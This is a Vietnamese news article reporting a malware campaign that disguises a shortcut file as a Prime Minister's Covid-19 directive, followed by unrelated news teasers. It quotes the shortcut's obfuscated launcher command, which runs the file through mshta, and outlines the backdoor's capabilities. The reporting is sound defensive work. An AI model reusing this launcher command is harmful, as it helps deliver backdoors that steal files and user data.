Xuất hiện mã độc mạo danh chỉ thị của Thủ tướng về dịch Covid-19

Ngọc Lưu - 09/03/2020 17:10 (GMT+7)

(VNF) - Mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc” liên quan đến công tác phòng chống dịch Covid-19, nhằm đánh lừa người dùng.

Thông tin từ Tập đoàn công nghệ CMC cho biết lợi dụng tình hình căng thẳng của dịch cúm Covid-19, mẫu mã độc giống với một số mẫu do nhóm tin tặc Panda phát triển được phát hiện đã thực hiện mạo danh văn 3 bản thông báo của chính phủ về tình hình dịch.

Mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc”.

Cụ thể, mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc” nhằm đánh lừa người dùng. File mẫu là một file shortcut có phần mở rộng là “.lnk” được ẩn dưới dạng một file winword nhằm đánh lừa người dùng do đuôi “.lnk” sẽ được Windows ẩn đi.

Tuy nhiên, file winword này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: “%comspec% /c for %x in (%temp%=%cd%) do for /f “delims==” %i in (‘dir “%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk” /s /b’) do start m%windir:~-1,1%hta.exe “%i”.

Sau khi lừa người dùng tải về, qua hàng loạt lệnh, mã độc sẽ tiến hành tạo bản sao của 3 file thực thi vào thư mục profile của user hoặc alluserprofile nếu có đủ quyền administrator; thêm và khóa autorun để tự kích hoạt file thực thi vừa drop ra khi khởi động lại máy; tạo mutex, kết nối đến server (máy chủ) để nhận lệnh từ server; tạo backdoor (cửa hậu) cho phép kẻ tấn công thực thi lệnh từ xa; hay hỗ trợ nhiều lệnh thực thi khác nhau bao gồm upload file, thư mục, list folder, đọc file, lấy thông tin máy tính, thông tin người dùng…

"Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng người đứng sau phát triển mã độc đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp", các chuyên gia của CMC nhận định.

Đây là một loại tấn công nguy hiểm, được đầu tư kỹ lưỡng nhằm đánh cắp các thông tin quan trọng và gây nhiều thiệt hại cho tổ chức. Để phòng ngừa các cuộc tấn công, các chuyên gia khuyến cáo người dùng luôn cảnh giác và chuẩn bị các phương án đề phòng, giám sát liên tục mới có thể đảm bảo tính an toàn cho hệ thống.

Ý kiến (0)
Cùng chuyên mục
Ba mỏ cát nghìn tỷ của Hà Nội: DN trúng đấu giá không đáp ứng điều kiện vốn

Ba mỏ cát nghìn tỷ của Hà Nội: DN trúng đấu giá không đáp ứng điều kiện vốn

(VNF) - Theo UBND thành phố Hà Nội, vốn chủ sở hữu của 3 đơn vị trúng đấu giá nhỏ hơn 30% giá trúng đấu giá nên sẽ nhỏ hơn 30% tổng vốn đầu tư của dự án khai thác khoáng sản mà đơn vị phải lập sau khi trúng đấu giá.

Bắt tạm giam ông Mai Tiến Dũng, nguyên Bộ trưởng, Chủ nhiệm Văn phòng Chính phủ

Bắt tạm giam ông Mai Tiến Dũng, nguyên Bộ trưởng, Chủ nhiệm Văn phòng Chính phủ

(VNF) - Cơ quan cảnh sát điều tra Bộ Công an đã ra quyết định khởi tố bị can, bắt tạm giam với ông Mai Tiến Dũng - nguyên Bộ trưởng, Chủ nhiệm Văn phòng Chính phủ về tội lợi dụng chức vụ quyền hạn trong khi thi hành công vụ.

Vụ 'Hậu Pháo': Đã bắt 23 bị can, tiếp tục điều tra mở rộng

Vụ 'Hậu Pháo': Đã bắt 23 bị can, tiếp tục điều tra mở rộng

(VNF) - Liên quan vụ án xảy ra tại Tập đoàn Phúc Sơn do Nguyễn Văn Hậu (Hậu Pháo) làm Chủ tịch HĐQT, đến nay cơ quan điều tra đã khởi tố, bắt tạm giam 23 bị can, tăng 6 bị can so với tháng trước.

Bắt Bí thư Tỉnh uỷ Bắc Giang Dương Văn Thái

Bắt Bí thư Tỉnh uỷ Bắc Giang Dương Văn Thái

(VNF) - Bí thư Tỉnh ủy Dương Văn Thái bị khởi tố, bắt tạm giam để điều tra về tội "Lợi dụng chức vụ, quyền hạn trong khi thi hành công vụ" liên quan đến vụ Thuận An.

CEO Group: Quý I lãi 35 tỷ, tăng 43%

CEO Group: Quý I lãi 35 tỷ, tăng 43%

(VNF) - Năm 2024, Công ty Cổ phần Tập đoàn C.E.O (CEO Group, HNX: CEO) tiếp tục đưa dự án CEOHOMES Hana Garden (Mê Linh, Hà Nội) vào kế hoạch kinh doanh.

Cựu chủ nhiệm Văn phòng Chính phủ Mai Tiến Dũng bị bắt

Cựu chủ nhiệm Văn phòng Chính phủ Mai Tiến Dũng bị bắt

(VNF) - Thông tin này được trung tướng Tô Ân Xô, người phát ngôn Bộ Công an cho biết tại buổi họp báo Chính phủ thường kỳ diễn ra chiều 4/5.

Trở thành đầu tàu kinh tế số, dân vùng Đông Nam bộ có thu nhập bình quân 16.000 USD/năm

Trở thành đầu tàu kinh tế số, dân vùng Đông Nam bộ có thu nhập bình quân 16.000 USD/năm

(VNF) - Thủ tướng Phạm Minh Chính vừa ký quyết định phê duyệt quy hoạch vùng Đông Nam Bộ thời kỳ 2021 – 2030, tầm nhìn đến năm 2050.

Thí điểm người đứng đầu được giới thiệu nhân sự bầu cử, bổ nhiệm cấp phó

Thí điểm người đứng đầu được giới thiệu nhân sự bầu cử, bổ nhiệm cấp phó

(VNF) - Bộ Chính trị thí điểm quy định cho phép người đứng đầu giới thiệu nhân sự bầu cử, bổ nhiệm làm cấp phó.

'Nhiều DN công nghệ toàn cầu muốn đầu tư chíp, bán dẫn tại Việt Nam'

'Nhiều DN công nghệ toàn cầu muốn đầu tư chíp, bán dẫn tại Việt Nam'

(VNF) - Thông tin này được Bộ trưởng Bộ Kế hoạch và Đầu tư Nguyễn Chí Dũng cho biết tại phiên họp Chính phủ thường kỳ diễn ra ngày 4/5.

30/6/2025: Nối trục cao tốc từ Hà Nội đến TP.HCM

30/6/2025: Nối trục cao tốc từ Hà Nội đến TP.HCM

(VNF) - Nhấn mạnh nhiều dự án cao tốc có khả năng hoàn thành trước từ 3-6 tháng so với kế hoạch, Thủ tướng cho biết dự kiến tới 30/6/2025 có thể nối trục đường bộ cao tốc từ Hà Nội tới TP. HCM.

Hình ảnh Cao tốc Vân Phong - Nha Trang 12.000 tỷ tăng tốc về đích trước 6 tháng

Hình ảnh Cao tốc Vân Phong - Nha Trang 12.000 tỷ tăng tốc về đích trước 6 tháng

(VNF) - Dự án cao tốc Vân Phong - Nha Trang có tổng vốn đầu tư 11.808 tỷ đồng sau hơn 1 năm thi công đã đạt 50% giá trị hợp đồng. Hiện các nhà thầu đang đẩy nhanh tiến độ, phấn đấu hoàn thành dự án trước 6 tháng.